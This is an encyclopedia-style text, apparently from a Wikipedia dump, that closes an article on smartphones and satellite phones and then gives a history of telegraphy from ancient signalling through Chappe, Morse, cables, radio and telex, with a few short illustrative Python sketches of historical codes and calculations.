As of 2022, most mobile phones are smartphones, being a combination of a mobile phone and a personal computing device in the same unit. Most smartphones are primarily operated using a graphical user interface and a touch screen. Many phones have a secondary voice user interface, such as Siri on Apple iPhones, which can operate many of the device's functions, as well as enabling users to use spoken commands to interact with the internet. Typically, alphanumeric text input is accomplished via an on-screen virtual keyboard, although some smartphones have a small physical keyboard. Smartphones offer the ability to access internet data through the cellular network and via Wi-Fi, and usually allow direct connectivity to other devices via Bluetooth or a wired interface, such as USB or Lightning connectors. Smartphones, being able to run apps, have vastly expanded functionality compared to previous mobile phones. Having internet access and built-in cameras, smartphones have made video calling readily accessible via IP connections. Smartphones also have access to a large number of web services and web apps, giving them functionality similar to traditional computers, although smartphones are often limited by their relatively small screen size and the size of their keyboards. Typically, smartphones feature such tools as cameras, media players, web browsers, email clients, interactive maps, satellite navigation and a variety of sensors, such as a compass, accelerometers and GPS receivers. In addition to voice calls, smartphone users commonly communicate using a wide variety of messaging formats, including SMS, MMS, email, and various proprietary messaging services, such as iMessage and various social media platforms.

Mobile phone usage
In 2002, only 10% of the world's population used mobile phones, and by 2005 that percentage had risen to 46%. By the end of 2009, there were a total of nearly 6 billion mobile and fixed-line telephone subscribers worldwide. This included 1.26 billion fixed-line subscribers and 4.6 billion mobile subscribers.

Satellite phones
A satellite telephone, or satphone, is a type of mobile phone that connects to other phones or the telephone network by radio link through satellites orbiting the Earth instead of terrestrial cell sites, as cellphones do. Therefore, they can work in most geographic locations on the Earth's surface, as long as there is open sky and a line of sight between the phone and the satellite. Depending on the architecture of a particular system, coverage may include the entire Earth or only specific regions.
Satellite phones provide similar functionality to terrestrial mobile telephones; voice calling, text messaging, and low-bandwidth Internet access are supported through most systems. The advantage of a satellite phone is that it can be used in regions where local terrestrial communication infrastructures, such as landline and cellular networks, are not available. Satellite phones are popular on expeditions into remote locations, for hunting, fishing, the maritime sector, humanitarian missions, business trips, and mining in hard-to-reach areas where there is no reliable cellular service. Satellite telephones are rarely disrupted by natural disasters on Earth or by human actions such as war, so they have proven to be dependable communication tools in emergency situations, when local communications systems can be compromised.
Technology
Media and communication
null
30010
https://en.wikipedia.org/wiki/Telegraphy
Telegraphy
Telegraphy is the long-distance transmission of messages where the sender uses symbolic codes, known to the recipient, rather than a physical exchange of an object bearing the message. Thus flag semaphore is a method of telegraphy, whereas pigeon post is not. Ancient signalling systems, although sometimes quite extensive and sophisticated as in China, were generally not capable of transmitting arbitrary text messages. Possible messages were fixed and predetermined, so such systems are thus not true telegraphs. The earliest true telegraph put into widespread use was the Chappe telegraph, an optical telegraph invented by Claude Chappe in the late 18th century. The system was used extensively in France, and in European nations occupied by France, during the Napoleonic era. The electric telegraph started to replace the optical telegraph in the mid-19th century. It was first taken up in Britain in the form of the Cooke and Wheatstone telegraph, initially used mostly as an aid to railway signalling. This was quickly followed by a different system developed in the United States by Samuel Morse. The electric telegraph was slower to develop in France due to the established optical telegraph system, but an electrical telegraph was put into use with a code compatible with the Chappe optical telegraph. The Morse system was adopted as the international standard in 1865, using a modified Morse code developed in Germany in 1848. The heliograph is a telegraph system using reflected sunlight for signalling. It was mainly used in areas where the electrical telegraph had not been established and generally used the same code. The most extensive heliograph network established was in Arizona and New Mexico during the Apache Wars. The heliograph was standard military equipment as late as World War II. Wireless telegraphy, which developed in the early 20th century, became important for maritime use and was a competitor to electrical telegraphy using submarine telegraph cables in international communications. Telegrams became a popular means of sending messages once telegraph prices had fallen sufficiently. Traffic became high enough to spur the development of automated systems: teleprinters and punched-tape transmission. These systems led to new telegraph codes, starting with the Baudot code. However, telegrams were never able to compete with the letter post on price, and competition from the telephone, which removed their speed advantage, drove the telegraph into decline from 1920 onwards. The few remaining telegraph applications were largely taken over by alternatives on the internet towards the end of the 20th century.

Terminology
The word telegraph (from Ancient Greek τῆλε (tēle) 'at a distance' and γράφειν (graphein) 'to write') was coined by the French inventor of the semaphore telegraph, Claude Chappe, who also coined the word semaphore. A telegraph is a device for transmitting and receiving messages over long distances, i.e., for telegraphy. The word telegraph alone generally refers to an electrical telegraph. Wireless telegraphy is transmission of messages over radio with telegraphic codes. Contrary to the extensive definition used by Chappe, Morse argued that the term telegraph can strictly be applied only to systems that transmit and record messages at a distance. This is to be distinguished from semaphore, which merely transmits messages. Smoke signals, for instance, are to be considered semaphore, not telegraph. According to Morse, telegraph dates only from 1832, when Pavel Schilling invented one of the earliest electrical telegraphs.
A telegraph message sent by an electrical telegraph operator or telegrapher using Morse code (or a printing telegraph operator using plain text) was known as a telegram. A cablegram was a message sent by a submarine telegraph cable, often shortened to "cable" or "wire". The suffix -gram is derived from Ancient Greek: γράμμα (grámma), meaning something written; i.e. telegram means something written at a distance and cablegram means something written via a cable, whereas telegraph implies the process of writing at a distance. Later, a Telex was a message sent by a Telex network, a switched network of teleprinters similar to a telephone network. A wirephoto or wire picture was a newspaper picture that was sent from a remote location by a facsimile telegraph. A diplomatic telegram, also known as a diplomatic cable, is a confidential communication between a diplomatic mission and the foreign ministry of its parent country. These continue to be called telegrams or cables regardless of the method used for transmission. History Early signalling Passing messages by signalling over distance is an ancient practice. One of the oldest examples is the signal towers of the Great Wall of China. Signals could be sent by beacon fires or drum beats. Over time, complex flag signalling developed, and by the Han dynasty (200 BC – 220 AD) signallers had a choice of lights, flags, or gunshots to send signals. By the Tang dynasty (618–907) a message could be sent in 24 hours. The Ming dynasty (1368–1644) added artillery to the possible signals. While the signalling was complex (for instance, different-coloured flags could be used to indicate enemy strength), only predetermined messages could be sent. The Chinese signalling system extended well beyond the Great Wall. Signal towers away from the wall were used to give early warning of an attack. Others were built even further out as part of the protection of trade routes, especially the Silk Road. Signal fires were widely used in Europe and elsewhere for military purposes. The Roman army made frequent use of them, as did their enemies, and the remains of some of the stations still exist. Few details have been recorded of European/Mediterranean signalling systems and the possible messages. One of the few for which details are known is a system invented by Aeneas Tacticus (4th century BC). Tacticus's system had water-filled pots at the two signal stations which were drained in synchronisation. Annotation on a floating scale indicated which message was being sent or received. Signals sent by means of torches indicated when to start and stop draining to keep the synchronisation. None of the signalling systems discussed above are true telegraphs in the sense of a system that can transmit arbitrary messages over arbitrary distances. Lines of signalling relay stations can send messages to any required distance, but all these systems are limited to one extent or another in the range of messages that they can send. A system like flag semaphore, with an alphabetic code, can certainly send any given message, but the system is designed for short-range communication between two persons. An engine order telegraph, used to send instructions from the bridge of a ship to the engine room, fails to meet both criteria; it has a limited distance and a very simple message set. Only one ancient signalling system that has been described meets these criteria: a system using the Polybius square to encode an alphabet.
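The coordinate scheme behind the Polybius square, described next, is simple enough to sketch in code. The following is an illustrative sketch of ours, not from the source; the 5×5 Latin-alphabet square with I and J sharing a cell is the conventional modern rendering of the Greek original:

```python
# Illustrative sketch: encoding letters as two torch counts using a
# Polybius square. Grid layout and function names are our own choices.
SQUARE = [
    "ABCDE",
    "FGHIK",  # I and J share a cell in the Latin adaptation
    "LMNOP",
    "QRSTU",
    "VWXYZ",
]

def torch_signals(message):
    """Return (row, column) torch counts for each letter of the message."""
    signals = []
    for ch in message.upper().replace("J", "I"):
        for row, letters in enumerate(SQUARE, start=1):
            if ch in letters:
                signals.append((row, letters.index(ch) + 1))
                break
    return signals

print(torch_signals("HELP"))  # [(2, 3), (1, 5), (3, 1), (3, 5)]
```

Each pair is sent as one group of torches for the row and a second group for the column, which is exactly the two-group scheme Polybius describes.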
Polybius (2nd century BC) suggested using two successive groups of torches to identify the coordinates of the letter of the alphabet being transmitted. The number of torches held up signalled the grid square that contained the letter. There is no definite record of the system ever being used, but there are several passages in ancient texts that some think are suggestive. Holzmann and Pehrson, for instance, suggest that Livy is describing its use by Philip V of Macedon in 207 BC during the First Macedonian War. Nothing else that could be described as a true telegraph existed until the 17th century. Possibly the first alphabetic telegraph code in the modern era is due to Franz Kessler, who published his work in 1616. Kessler used a lamp placed inside a barrel with a moveable shutter operated by the signaller. The signals were observed at a distance with the newly invented telescope. Optical telegraph An optical telegraph is a telegraph consisting of a line of stations in towers or natural high points which signal to each other by means of shutters or paddles. Signalling by means of indicator pointers was called semaphore. Early proposals for an optical telegraph system were made to the Royal Society by Robert Hooke in 1684 and were first implemented on an experimental level by Richard Lovell Edgeworth in 1767. The first successful optical telegraph network was invented by Claude Chappe and operated in France from 1793. The two most extensive systems were Chappe's in France, with branches into neighbouring countries, and the system of Abraham Niclas Edelcrantz in Sweden. During 1790–1795, at the height of the French Revolution, France needed a swift and reliable communication system to thwart the war efforts of its enemies. In 1790, the Chappe brothers set about devising a system of communication that would allow the central government to receive intelligence and to transmit orders in the shortest possible time. On 2 March 1791, at 11 am, they sent the message "si vous réussissez, vous serez bientôt couverts de gloire" (If you succeed, you will soon bask in glory) between Brulon and Parcé. This first system used a combination of black and white panels, clocks, telescopes, and codebooks to send the message. In 1792, Claude was appointed Ingénieur-Télégraphiste and charged with establishing a line of stations between Paris and Lille. It was used to carry dispatches for the war between France and Austria. In 1794, it brought news of a French capture of Condé-sur-l'Escaut from the Austrians less than an hour after it occurred. A decision to replace the system with an electric telegraph was made in 1846, but it took a decade before it was fully taken out of service. The fall of Sevastopol was reported by Chappe telegraph in 1855. The Prussian system was put into effect in the 1830s. However, optical systems were highly dependent on good weather and daylight to work, and even then could accommodate only about two words per minute. The last commercial semaphore link ceased operation in Sweden in 1880. As of 1895, France still operated coastal commercial semaphore telegraph stations, for ship-to-shore communication. Electrical telegraph Early ideas for an electric telegraph included an anonymous 1753 proposal using electrostatic deflections of pith balls and proposals for electrochemical bubbles in acid by Campillo in 1804 and von Sömmering in 1809. The first experimental system over a substantial distance was by Ronalds in 1816 using an electrostatic generator.
Ronalds offered his invention to the British Admiralty, but it was rejected as unnecessary, the existing optical telegraph connecting the Admiralty in London to their main fleet base in Portsmouth being deemed adequate for their purposes. As late as 1844, after the electrical telegraph had come into use, the Admiralty's optical telegraph was still used, although it was accepted that poor weather ruled it out on many days of the year. France had an extensive optical telegraph system dating from Napoleonic times and was even slower to take up electrical systems. Eventually, electrostatic telegraphs were abandoned in favour of electromagnetic systems. An early experimental system (Schilling, 1832) led to a proposal to establish a telegraph between St Petersburg and Kronstadt, but it was never completed. The first operative electric telegraph (Gauss and Weber, 1833) connected Göttingen Observatory to the Institute of Physics about 1 km away during experimental investigations of the geomagnetic field. The first commercial telegraph was by Cooke and Wheatstone following their English patent of 10 June 1837. It was demonstrated on the London and Birmingham Railway in July of the same year. In July 1839, a five-needle, five-wire system was installed to provide signalling over a record distance of 21 km on a section of the Great Western Railway between London Paddington station and West Drayton. However, in trying to get railway companies to take up his telegraph more widely for railway signalling, Cooke was rejected several times in favour of the more familiar, but shorter range, steam-powered pneumatic signalling. Even when his telegraph was taken up, it was considered experimental and the company backed out of a plan to finance extending the telegraph line out to Slough. However, this led to a breakthrough for the electric telegraph, as up to this point the Great Western had insisted on exclusive use and refused Cooke permission to open public telegraph offices. Cooke extended the line at his own expense and agreed that the railway could have free use of it in exchange for the right to open it up to the public. Most of the early electrical systems required multiple wires (Ronalds' system was an exception), but the system developed in the United States by Morse and Vail was a single-wire system. This was the system that first used the soon-to-become-ubiquitous Morse code. By 1844, the Morse system connected Baltimore to Washington, and by 1861 the west coast of the continent was connected to the east coast. The Cooke and Wheatstone telegraph, in a series of improvements, also ended up with a one-wire system, but still using their own code and needle displays. The electric telegraph quickly became a means of more general communication. The Morse system was officially adopted as the standard for continental European telegraphy in 1851 with a revised code, which later became the basis of International Morse Code. However, Great Britain and the British Empire continued to use the Cooke and Wheatstone system, in some places as late as the 1930s. Likewise, the United States continued to use American Morse code internally, requiring translation operators skilled in both codes for international messages. Railway telegraphy Railway signal telegraphy was developed in Britain from the 1840s onward. It was used to manage railway traffic and to prevent accidents as part of the railway signalling system. On 12 June 1837 Cooke and Wheatstone were awarded a patent for an electric telegraph. 
This was demonstrated between Euston railway station—where Wheatstone was located—and the engine house at Camden Town—where Cooke was stationed, together with Robert Stephenson, the London and Birmingham Railway line's chief engineer. The messages were for the operation of the rope-haulage system for pulling trains up the 1 in 77 bank. The world's first permanent railway telegraph was completed in July 1839 between London Paddington and West Drayton on the Great Western Railway with an electric telegraph using a four-needle system. The concept of a signalling "block" system was proposed by Cooke in 1842. Railway signal telegraphy did not change in essence from Cooke's initial concept for more than a century. In this system each line of railway was divided into sections or blocks of varying length. Entry to and exit from the block was to be authorised by electric telegraph and signalled by the line-side semaphore signals, so that only a single train could occupy the rails in any one block. In Cooke's original system, a single-needle telegraph was adapted to indicate just two messages: "Line Clear" and "Line Blocked". The signaller would adjust his line-side signals accordingly. As first implemented in 1844, each station had as many needles as there were stations on the line, giving a complete picture of the traffic. As lines expanded, a sequence of pairs of single-needle instruments was adopted, one pair for each block in each direction. Wigwag Wigwag is a form of flag signalling using a single flag. Unlike most forms of flag signalling, which are used over relatively short distances, wigwag was designed to maximise the distance covered. Wigwag achieved this by using a large flag—a single flag can be held with both hands, unlike flag semaphore, which has a flag in each hand—and by using motions rather than positions as its symbols, since motions are more easily seen. It was invented in the 1850s by US Army surgeon Albert J. Myer, who later became the first head of the Signal Corps. Wigwag was used extensively during the American Civil War, where it filled a gap left by the electrical telegraph. Although the electrical telegraph had been in use for more than a decade, the network did not yet reach everywhere and portable, ruggedized equipment suitable for military use was not immediately available. Permanent or semi-permanent stations were established during the war, some of them towers of enormous height, and the system was extensive enough to be described as a communications network. Heliograph A heliograph is a telegraph that transmits messages by flashing sunlight with a mirror, usually using Morse code. The idea for a telegraph of this type was first proposed as a modification of surveying equipment (Gauss, 1821). Various uses of mirrors were made for communication in the following years, mostly for military purposes, but the first device to become widely used was a heliograph with a moveable mirror (Mance, 1869). The system was used by the French during the 1870–71 siege of Paris, with night-time signalling using kerosene lamps as the source of light. An improved version (Begbie, 1870) was used by the British military in many colonial wars, including the Anglo-Zulu War (1879). At some point, a Morse key was added to the apparatus to give the operator the same degree of control as in the electric telegraph. Another type of heliograph was the heliostat or heliotrope fitted with a Colomb shutter.
The heliostat was essentially a surveying instrument with a fixed mirror and so could not transmit a code by itself. The term heliostat is sometimes used as a synonym for heliograph because of this origin. The Colomb shutter (Bolton and Colomb, 1862) was originally invented to enable the transmission of Morse code by signal lamp between Royal Navy ships at sea. The heliograph was heavily used by Nelson A. Miles in Arizona and New Mexico after he took over command (1886) of the fight against Geronimo and other Apache bands in the Apache Wars. Miles had previously set up the first heliograph line in the US between Fort Keogh and Fort Custer in Montana. He used the heliograph to fill in vast, thinly populated areas that were not covered by the electric telegraph. Twenty-six stations covered a vast area. In a test of the system, a message was relayed in four hours. Miles' enemies used smoke signals and flashes of sunlight from metal, but lacked a sophisticated telegraph code. The heliograph was ideal for use in the American Southwest due to its clear air and mountainous terrain on which stations could be located. It was found necessary to lengthen the Morse dash (which is much shorter in American Morse code than in the modern International Morse code) to aid in differentiating it from the Morse dot. Use of the heliograph declined from 1915 onwards, but it remained in service in Britain and British Commonwealth countries for some time. Australian forces used the heliograph as late as 1942 in the Western Desert Campaign of World War II. Some form of heliograph was used by the mujahideen in the Soviet–Afghan War (1979–1989). Teleprinter A teleprinter is a telegraph machine that can send messages from a typewriter-like keyboard and print incoming messages in readable text, with no need for the operators to be trained in the telegraph code used on the line. It developed from various earlier printing telegraphs and resulted in improved transmission speeds. The Morse telegraph (1837) was originally conceived as a system marking indentations on paper tape. A chemical telegraph making blue marks improved the speed of recording (Bain, 1846), but was delayed by a patent challenge from Morse. The first true printing telegraph (that is, printing in plain text) used a spinning wheel of types in the manner of a daisy wheel printer (House, 1846, improved by Hughes, 1855). The system was adopted by Western Union. Early teleprinters used the Baudot code, a five-bit sequential binary code. This was a telegraph code developed for use on the French telegraph using a five-key keyboard (Baudot, 1874). Teleprinters generated the same code from a full alphanumeric keyboard. A feature of the Baudot code, and subsequent telegraph codes, was that, unlike Morse code, every character has a code of the same length, making it more machine-friendly. Printing telegraphs of this kind were also the basis of the earliest ticker tape machines (Calahan, 1867), a system for mass distribution of the current prices of publicly listed companies. Automated punched-tape transmission In a punched-tape system, the message is first typed onto punched tape using the code of the telegraph system—Morse code for instance. It is then, either immediately or at some later time, run through a transmission machine which sends the message to the telegraph network. Multiple messages can be sequentially recorded on the same run of tape. The advantage of doing this is that messages can be sent at a steady, fast rate, making maximum use of the available telegraph lines.
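As a rough illustration of the fixed-length property of the Baudot code and of how a message becomes rows of holes on five-level tape, here is a sketch of ours, not from the source; the letters are simply numbered alphabetically rather than using the real Baudot assignments, which also included shift codes for figures:

```python
# Hedged sketch: a message as five-hole tape rows. Real Baudot/ITA2 code
# assignments differ; the point is that every character occupies exactly
# one five-bit row, so tape can be punched and read at a constant rate.
def punch(message):
    for ch in message.upper():
        code = ord(ch) - ord("A")          # stand-in for the real code table
        bits = format(code, "05b")
        print(bits.replace("1", "o").replace("0", "."))  # o = hole

punch("CAB")
# ...o.
# .....
# ....o
```

Five bits give 2**5 = 32 patterns, enough for 26 letters plus control codes, with a figures shift reusing the same patterns for digits and punctuation.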
The economic advantage of doing this is greatest on long, busy routes where the cost of the extra step of preparing the tape is outweighed by the cost of providing more telegraph lines. The first machine to use punched tape was Bain's teleprinter (Bain, 1843), but the system saw only limited use. Later versions of Bain's system achieved speeds up to 1000 words per minute, far faster than a human operator could achieve. The first widely used system (Wheatstone, 1858) was first put into service with the British General Post Office in 1867. A novel feature of the Wheatstone system was the use of bipolar encoding. That is, both positive and negative polarity voltages were used. Bipolar encoding has several advantages, one of which is that it permits duplex communication. The Wheatstone tape reader was capable of a speed of 400 words per minute. Oceanic telegraph cables A worldwide communication network meant that telegraph cables would have to be laid across oceans. On land cables could be run uninsulated suspended from poles. Underwater, a good insulator that was both flexible and capable of resisting the ingress of seawater was required. A solution presented itself with gutta-percha, a natural rubber from the Palaquium gutta tree, after William Montgomerie sent samples to London from Singapore in 1843. The new material was tested by Michael Faraday and in 1845 Wheatstone suggested that it should be used on the cable planned between Dover and Calais by John Watkins Brett. The idea was proved viable when the South Eastern Railway company successfully tested a gutta-percha insulated cable with telegraph messages to a ship off the coast of Folkestone. The cable to France was laid in 1850 but was almost immediately severed by a French fishing vessel. It was relaid the next year and connections to Ireland and the Low Countries soon followed. Getting a cable across the Atlantic Ocean proved much more difficult. The Atlantic Telegraph Company, formed in London in 1856, had several failed attempts. A cable laid in 1858 worked poorly for a few days, sometimes taking all day to send a message despite the use of the highly sensitive mirror galvanometer developed by William Thomson (the future Lord Kelvin) before being destroyed by applying too high a voltage. Its failure and slow speed of transmission prompted Thomson and Oliver Heaviside to find better mathematical descriptions of long transmission lines. The company finally succeeded in 1866 with an improved cable laid by SS Great Eastern, the largest ship of its day, designed by Isambard Kingdom Brunel. An overland telegraph from Britain to India was first connected in 1866 but was unreliable so a submarine telegraph cable was connected in 1870. Several telegraph companies were combined to form the Eastern Telegraph Company in 1872. Australia was first linked to the rest of the world in October 1872 by a submarine telegraph cable at Darwin. From the 1850s until well into the 20th century, British submarine cable systems dominated the world system. This was set out as a formal strategic goal, which became known as the All Red Line. In 1896, there were thirty cable-laying ships in the world and twenty-four of them were owned by British companies. In 1892, British companies owned and operated two-thirds of the world's cables and by 1923, their share was still 42.7 percent. During World War I, Britain's telegraph communications were almost completely uninterrupted while it was able to quickly cut Germany's cables worldwide. 
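The signalling problem Thomson analysed can be sketched quantitatively. His "law of squares" treated a long cable as distributed series resistance and shunt capacitance, so the signal rise time grows with the square of the length; the constants below are round hypothetical numbers of ours, not measured cable data:

```python
# Hedged sketch of Thomson's law of squares for a long submarine cable.
# R and C are resistance and capacitance per unit length (hypothetical).
R = 3e-3   # ohms per metre
C = 1e-10  # farads per metre

for length in (1e6, 2e6, 4e6):  # cable lengths in metres
    delay = R * C * length**2   # characteristic retardation, seconds
    print(f"{length / 1e3:>6.0f} km -> relative delay ~ {delay:.1f} s")
```

Doubling the length quadruples the retardation, which is why a cable long enough to span the Atlantic behaved so differently from the short land lines on which telegraphy had been developed, and why Heaviside's fuller transmission-line treatment mattered.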
Facsimile In 1843, Scottish inventor Alexander Bain invented a device that could be considered the first facsimile machine. He called his invention a "recording telegraph". Bain's telegraph was able to transmit images by electrical wires. Frederick Bakewell made several improvements on Bain's design and demonstrated a telefax machine. In 1855, an Italian priest, Giovanni Caselli, also created an electric telegraph that could transmit images. Caselli called his invention "Pantelegraph". The pantelegraph was successfully tested and approved for a telegraph line between Paris and Lyon. In 1881, English inventor Shelford Bidwell constructed the scanning phototelegraph, the first telefax machine able to scan any two-dimensional original, not requiring manual plotting or drawing. Around 1900, German physicist Arthur Korn invented the Bildtelegraph, which became widespread in continental Europe, especially after a widely noticed transmission of a wanted-person photograph from Paris to London in 1908, and which remained in use until the wider distribution of the radiofax. Its main competitors were first the Bélinographe of Édouard Belin and then, from the 1930s, the Hellschreiber, invented in 1929 by German inventor Rudolf Hell, a pioneer in mechanical image scanning and transmission. Wireless telegraphy The late 1880s through to the 1890s saw the discovery and then development of a newly understood phenomenon into a form of wireless telegraphy, called Hertzian wave wireless telegraphy, radiotelegraphy, or (later) simply "radio". Between 1886 and 1888, Heinrich Rudolf Hertz published the results of his experiments where he was able to transmit electromagnetic waves (radio waves) through the air, proving James Clerk Maxwell's 1873 theory of electromagnetic radiation. Many scientists and inventors experimented with this new phenomenon, but the consensus was that these new waves (similar to light) would be just as short-range as light and, therefore, useless for long-range communication. At the end of 1894, the young Italian inventor Guglielmo Marconi began working on the idea of building a commercial wireless telegraphy system based on the use of Hertzian waves (radio waves), a line of inquiry that he noted other inventors did not seem to be pursuing. Building on the ideas of previous scientists and inventors, Marconi re-engineered their apparatus by trial and error, attempting to build a radio-based wireless telegraphic system that would function the same as wired telegraphy. He would work on the system through 1895 in his lab and then in field tests, making improvements to extend its range. After many breakthroughs, including applying the wired telegraphy concept of grounding the transmitter and receiver, Marconi was able, by early 1896, to transmit radio far beyond the short ranges that had been predicted. Having failed to interest the Italian government, the 22-year-old inventor brought his telegraphy system to Britain in 1896 and met William Preece, a Welshman, who was a major figure in the field and Chief Engineer of the General Post Office. A series of demonstrations for the British government followed—by March 1897, Marconi had transmitted Morse code signals across Salisbury Plain. On 13 May 1897, Marconi, assisted by George Kemp, a Cardiff Post Office engineer, transmitted the first wireless signals over water to Lavernock (near Penarth in Wales) from Flat Holm. His star rising, he was soon sending signals across the English Channel (1899), from shore to ship (1899) and finally across the Atlantic (1901).
A study of these demonstrations of radio, with scientists trying to work out how a phenomenon predicted to have a short range could transmit "over the horizon", led to the discovery of a radio-reflecting layer in the Earth's atmosphere in 1902, later called the ionosphere. Radiotelegraphy proved effective for rescue work in sea disasters by enabling effective communication between ships and from ship to shore. In 1904, Marconi began the first commercial service to transmit nightly news summaries to subscribing ships, which could incorporate them into their on-board newspapers. A regular transatlantic radio-telegraph service was finally begun on 17 October 1907. Notably, Marconi's apparatus was used to help rescue efforts after the sinking of RMS Titanic. Britain's postmaster-general summed up, referring to the Titanic disaster, "Those who have been saved, have been saved through one man, Mr. Marconi...and his marvellous invention." Non-radio wireless telegraphy The successful development of radiotelegraphy was preceded by a 50-year history of ingenious but ultimately unsuccessful experiments by inventors to achieve wireless telegraphy by other means. Ground, water, and air conduction Several wireless electrical signaling schemes based on the (sometimes erroneous) idea that electric currents could be conducted long-range through water, ground, and air were investigated for telegraphy before practical radio systems became available. The original telegraph lines used two wires between the two stations to form a complete electrical circuit or "loop". In 1837, however, Carl August von Steinheil of Munich, Germany, found that by connecting one leg of the apparatus at each station to metal plates buried in the ground, he could eliminate one wire and use a single wire for telegraphic communication. This led to speculation that it might be possible to eliminate both wires and therefore transmit telegraph signals through the ground without any wires connecting the stations. Other attempts were made to send the electric current through bodies of water, to span rivers, for example. Prominent experimenters along these lines included Samuel F. B. Morse in the United States and James Bowman Lindsay in Great Britain, who in August 1854 was able to demonstrate transmission across a mill dam. US inventors William Henry Ward (1871) and Mahlon Loomis (1872) developed electrical conduction systems based on the erroneous belief that there was an electrified atmospheric stratum accessible at low altitude. They thought atmospheric current, connected with a return path using "Earth currents", would allow for wireless telegraphy as well as supplying power for the telegraph, doing away with artificial batteries. A more practical demonstration of wireless transmission via conduction came in Amos Dolbear's 1879 magneto-electric telephone, which used ground conduction to transmit over a distance of a quarter of a mile. In the 1890s, inventor Nikola Tesla worked on an air and ground conduction wireless electric power transmission system, similar to that of Loomis, into which he planned to incorporate wireless telegraphy. Tesla's experiments had led him to incorrectly conclude that he could use the entire globe of the Earth to conduct electrical energy, and his large-scale 1901 application of these ideas, a high-voltage wireless power station, now called Wardenclyffe Tower, lost funding and was abandoned after a few years.
Telegraphic communication using earth conductivity was eventually found to be limited to impractically short distances, as was communication conducted through water, or between trenches during World War I. Electrostatic and electromagnetic induction Both electrostatic and electromagnetic induction were used to develop wireless telegraph systems that saw limited commercial application. In the United States, Thomas Edison, in the mid-1880s, patented an electromagnetic induction system he called "grasshopper telegraphy", which allowed telegraphic signals to jump the short distance between a running train and telegraph wires running parallel to the tracks. This system was successful technically but not economically, as there turned out to be little interest by train travelers in the use of an on-board telegraph service. During the Great Blizzard of 1888, this system was used to send and receive wireless messages from trains buried in snowdrifts. The disabled trains were able to maintain communications via their Edison induction wireless telegraph systems, perhaps the first successful use of wireless telegraphy to send distress calls. Edison would also help to patent a ship-to-shore communication system based on electrostatic induction. The most successful creator of an electromagnetic induction telegraph system was William Preece, chief engineer of Post Office Telegraphs of the General Post Office (GPO) in the United Kingdom. Preece first noticed the effect in 1884 when overhead telegraph wires in Grays Inn Road were accidentally carrying messages sent on buried cables. Tests in Newcastle succeeded in sending signals a quarter of a mile using parallel rectangles of wire. In tests across the Bristol Channel in 1892, Preece was able to telegraph across gaps of several kilometres. However, his induction system required extensive lengths of antenna wires, many kilometers long, at both the sending and receiving ends. The length of those sending and receiving wires needed to be about the same as the width of the water or land to be spanned. For example, for Preece's station to span the English Channel from Dover, England, to the coast of France would require sending and receiving wires tens of kilometres long along the two coasts. These facts made the system impractical on ships, boats, and ordinary islands, which are much smaller than Great Britain or Greenland. Also, the relatively short distances that a practical Preece system could span meant that it had few advantages over underwater telegraph cables. Telegram services A telegram service is a company or public entity that delivers telegraphed messages directly to the recipient. Telegram services were not inaugurated until electric telegraphy became available. Earlier optical systems were largely limited to official government and military purposes. Historically, telegrams were sent between a network of interconnected telegraph offices. A person visiting a local telegraph office paid by the word to have a message telegraphed to another office and delivered to the addressee on a paper form. Messages (i.e. telegrams) sent by telegraph could be delivered by telegraph messenger faster than mail, and even in the telephone age, the telegram remained popular for social and business correspondence. At their peak in 1929, an estimated 200 million telegrams were sent. In 1919, the Central Bureau for Registered Addresses was established in the financial district of New York City. The bureau was created to ease the growing problem of messages being delivered to the wrong recipients.
To combat this issue, the bureau offered telegraph customers the option to register unique code names for their telegraph addresses. Customers were charged $2.50 per year per code. By 1934, 28,000 codes had been registered. Telegram services still operate in much of the world (see worldwide use of telegrams by country), but e-mail and text messaging have rendered telegrams obsolete in many countries, and the number of telegrams sent annually has been declining rapidly since the 1980s. Where telegram services still exist, the transmission method between offices is no longer by telegraph, but by telex or IP link. Telegram length As telegrams have traditionally been charged by the word, messages were often abbreviated to pack information into the smallest possible number of words, in what came to be called "telegram style". The average length of a telegram in the 1900s in the US was 11.93 words; more than half of the messages were 10 words or fewer. According to another study, the mean length of the telegrams sent in the UK before 1950 was 14.6 words or 78.8 characters. For German telegrams, the mean length was 11.5 words or 72.4 characters. At the end of the 19th century, the average length of a German telegram was calculated as 14.2 words. Telex Telex (telegraph exchange) was a public switched network of teleprinters. It used rotary-telephone-style pulse dialling for automatic routing through the network. It initially used the Baudot code for messages. Telex development began in Germany in 1926, becoming an operational service in 1933 run by the Reichspost (the German imperial postal service). It had a speed of 50 baud—approximately 66 words per minute. Up to 25 telex channels could share a single long-distance telephone channel by using voice frequency telegraphy multiplexing, making telex the least expensive method of reliable long-distance communication. Telex was introduced into Canada in July 1957, and into the United States in 1958. A new code, ASCII, was introduced in 1963 by the American Standards Association. ASCII was a seven-bit code and could thus support a larger number of characters than Baudot. In particular, ASCII supported upper and lower case, whereas Baudot was upper case only. Decline Telegraph use began to permanently decline around 1920. The decline began with the growth of the use of the telephone. Ironically, the invention of the telephone grew out of the development of the harmonic telegraph, a device that was supposed to increase the efficiency of telegraph transmission and improve the profits of telegraph companies. Western Union gave up its patent battle with Alexander Graham Bell because it believed the telephone was not a threat to its telegraph business. The Bell Telephone Company was formed in 1877 and had 230 subscribers, which grew to 30,000 by 1880. By 1886 there were a quarter of a million phones worldwide, and nearly 2 million by 1900. The decline was briefly postponed by the rise of special-occasion congratulatory telegrams. Traffic continued to grow between 1867 and 1893 despite the introduction of the telephone in this period, but by 1900 the telegraph was definitely in decline. There was a brief resurgence in telegraphy during World War I, but the decline continued as the world entered the Great Depression years of the 1930s. After the Second World War, new technology improved communication in the telegraph industry.
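Returning briefly to the Telex figures quoted above: the quoted speed of 50 baud and the approximately 66 words per minute are consistent under the usual teleprinter framing of one start bit, five data bits, and 1.5 stop bits per character, which is an assumption of ours rather than a statement in the source:

```python
# Hedged sketch: reconciling 50 baud with ~66 words per minute.
baud = 50                    # signalling elements per second
bits_per_char = 1 + 5 + 1.5  # start + five data + stop (assumed framing)
chars_per_second = baud / bits_per_char
words_per_minute = chars_per_second * 60 / 6  # 6 chars per word incl. space
print(f"{words_per_minute:.1f}")  # ~66.7
```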
